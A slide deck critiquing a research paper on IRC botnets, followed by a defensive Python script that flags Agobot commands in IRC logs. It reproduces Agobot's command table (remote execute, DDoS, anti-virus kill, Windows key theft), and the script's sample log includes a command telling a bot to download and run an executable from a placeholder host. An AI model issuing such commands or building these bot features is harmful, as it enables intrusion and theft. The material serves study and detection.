Offense: Brute Force
A Multifaceted Approach to Understanding the Botnet Phenomenon (Rajab/Zarfoss/Monrose/Terzis)

Upload: cornelia-montgomery

Post on 18-Dec-2015


Page 1: Offense: Brute Force
A Multifaceted Approach to Understanding the Botnet Phenomenon (Rajab/Zarfoss/Monrose/Terzis)

Page 2: Enough Data?

Research paper states:
- 800,000 DNS domains examined
- 85,000 servers botnet-infected
- 65 IRC server domain names

Is the above data statistically significant?
- 450,000,000 hosts via DNS (isc.org)
- Over 150,000,000 domain names exist
- 47,700,000 .com domains (1% probed)

Page 3: Realtime Tracking

Source: Shadowserver.org

Page 4: Longitudinal Tracking

Research paper states:
- 65 IRC server domain names
- 85,000 servers infected by bots
- Type-II botnets only

Shadowserver.org tracking (2+ years):
- 1800 active botnets daily
- 3,000,000 active bots daily
- Updates every 15 minutes

Page 5: Where's the 40%?

- Research paper exclusively WinTel
  - Easier to obtain bot binaries?
- Most internet servers are Linux-based
  - Hard to ignore the majority
- Worm or Trojan backdoors exploited
  - Defenses are already weakened

Page 6: Botnet size

- Footprint vs. effective size
  - The paper complains that the footprint is much larger than the effective size.
  - So? Bots are trying to stay off DNSBLs (black lists) and be more stealthy.
- Sections of footprint may be rented out

Page 7: Botmaster concerns

Source: swatit.org

Page 8: C&C Stealth

- Botmasters want to remain hidden
  - IRC-based isn't the only way
  - Peer-to-peer systems hide IP source addr
  - Virtualization of C&C
- Dynamic web servers
  - Network creation/reconfiguration
  - Come and go quickly
  - Difficult to trace
  - Works for honeypots, why not botnets?

Page 9: Gray-box testing

- Only binary bot behavior studied
- Results limited by mimicking IRC state
- Research emphasized automation over thoroughness
- Source code or disassembly reveals more
- Behavior may be different in a honeynet

Page 10: Agobot C&C

Command              Description
bot.about            Displays information (e.g., version) about the bot code
bot.die              Terminates the bot
bot.dns              Resolves IP/hostname via DNS
bot.execute          Makes the bot execute a specific .exe
bot.id               Displays the ID of the current bot code
bot.nick             Changes the nickname of the bot
bot.open             Opens a specified file
bot.remove           Removes the bot from the host
bot.removeallbut     Removes the bot if ID does not match
bot.rndnick          Makes the bot generate a new random nickname
bot.status           Echo bot status information
bot.sysinfo          Echo the bot's system information
bot.longuptime       If uptime > 7 days then bot will respond
bot.highspeed        If speed > 5000 then bot will respond
bot.quit             Quits the bot
bot.flushdns         Flushes the bot's DNS cache
bot.secure           Delete specified shares and disable DCOM
bot.unsecure         Enable specified shares and enable DCOM
bot.command          Executes a specified command with system()

Variable             Description
bot ftrans port      Set bot - file transfer port
bot ftrans port ftp  Set bot - file transfer port for FTP
si chanpass          IRC server information - channel password
si mainchan          IRC server information - main channel
si nickprefix        IRC server information - nickname prefix
si port              IRC server information - server port
si server            IRC server information - server address
si servpass          IRC server information - server password
si usessl            IRC server information - use SSL?
si nick              IRC server information - nickname
bot version          Bot - version
bot filename         Bot - runtime filename
bot id               Bot - current ID
bot prefix           Bot - command prefix
bot timeo            Bot - timeout for receiving (in milliseconds)
bot seclogin         Bot - enable login only by channel messages
bot compnick         Bot - use the computer name as a nickname
bot randnick         Bot - random nicknames of letters and numbers
bot meltserver       Bot - melt the original server file
bot topiccmd         Bot - execute topic commands
do speedtest         Bot - do speed test on startup
do avkill            Bot - enable anti-virus kill
do stealth           Bot - enable stealth operation
as valname           Autostart - value name
as enabled           Autostart - enabled
as service           Autostart - start as service
as service name      Autostart - short service name
scan maxthreads      Scanner - maximum number of threads
scan maxsockets      Scanner - maximum number of sockets
ddos maxthreads      DDoS - maximum number of threads
redir maxthreads     Redirect - maximum number of threads
identd enabled       IdentD - enable the server
cdkey windows        Return Windows product keys on cdkey.get
scaninfo chan        Scanner - output channel
scaninfo level       Info level 1 (less) - 3 (more)
spam aol channel     AOL spam - channel name
spam aol enabled     AOL spam - enabled?
sniffer enabled      Sniffer - enabled?
sniffer channel      Sniffer - output channel
vuln channel         Vulnerability daemon sniffer channel
inst polymorph       Installer - polymorphic on install?
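As an added example (not from the slides or the paper), a small defender-side IRC log inspector that flags the Agobot commands listed above whenever one appears as the first token of a PRIVMSG, allowing for the configurable command prefix noted in the variable table ('bot prefix'); the sample traffic, nicks and hostnames are constructed, and the '.'/'!' prefix handling is an assumption.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
# Agobot command vocabulary, taken from the command table above.
AGOBOT_COMMANDS = {
    "bot.about", "bot.die", "bot.dns", "bot.execute", "bot.id", "bot.nick",
    "bot.open", "bot.remove", "bot.removeallbut", "bot.rndnick", "bot.status",
    "bot.sysinfo", "bot.longuptime", "bot.highspeed", "bot.quit",
    "bot.flushdns", "bot.secure", "bot.unsecure", "bot.command",
}
# Commands that run code or weaken the host get a higher severity.
HIGH_RISK = {"bot.execute", "bot.command", "bot.open", "bot.unsecure"}
# RFC 1459 PRIVMSG line: ":nick!user@host PRIVMSG <target> :<text>"
PRIVMSG_RE = re.compile(r"^:(?P<nick>[^!\s]+)\S* PRIVMSG (?P<target>\S+) :(?P<text>.*)$")
@dataclass
class Alert:
    nick: str      # who issued the command
    target: str    # channel, or a single bot's nick
    command: str
    args: str
    severity: str  # "high" or "info"

def inspect_line(line: str) -> Optional[Alert]:
    # Returns an Alert if the IRC line carries an Agobot command, else None.
    m = PRIVMSG_RE.match(line.strip())
    if not m:
        return None
    text = m.group("text")
    # 'bot prefix' is configurable; assume a single '.' or '!' (or none at all).
    if text[:1] in (".", "!"):
        text = text[1:]
    parts = text.split(None, 1)
    if not parts or parts[0].lower() not in AGOBOT_COMMANDS:
        return None  # matches the first token only, not substrings
    cmd = parts[0].lower()
    args = parts[1] if len(parts) > 1 else ""
    return Alert(m.group("nick"), m.group("target"), cmd, args,
                 "high" if cmd in HIGH_RISK else "info")

def scan_irc_log(lines: Iterable[str]) -> List[Alert]:
    return [a for a in map(inspect_line, lines) if a is not None]

# Constructed sample log (not a real capture; .invalid TLD, 203.0.113.0/24 doc range).
SAMPLE_LOG = [
    ":operator!op@203.0.113.7 PRIVMSG #chan :.bot.sysinfo",
    ":operator!op@203.0.113.7 PRIVMSG #chan :.bot.execute http://example.invalid/update.exe",
    ":alice!a@203.0.113.9 PRIVMSG #chan :has anyone read the bot.about section of the paper?",
    ":operator!op@203.0.113.7 PRIVMSG drone42 :bot.command dir",
]
```

The third sample line shows why the check keys on the first token: ordinary chat that merely mentions a command name produces no alert.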

Page 11: Botnet evolution

- Polymorphic bot code
- Gmail as control protocol
- SSL usage
  - Invisible to network inspection
- XML/RSS messages
- Exploit IPv6 flaws
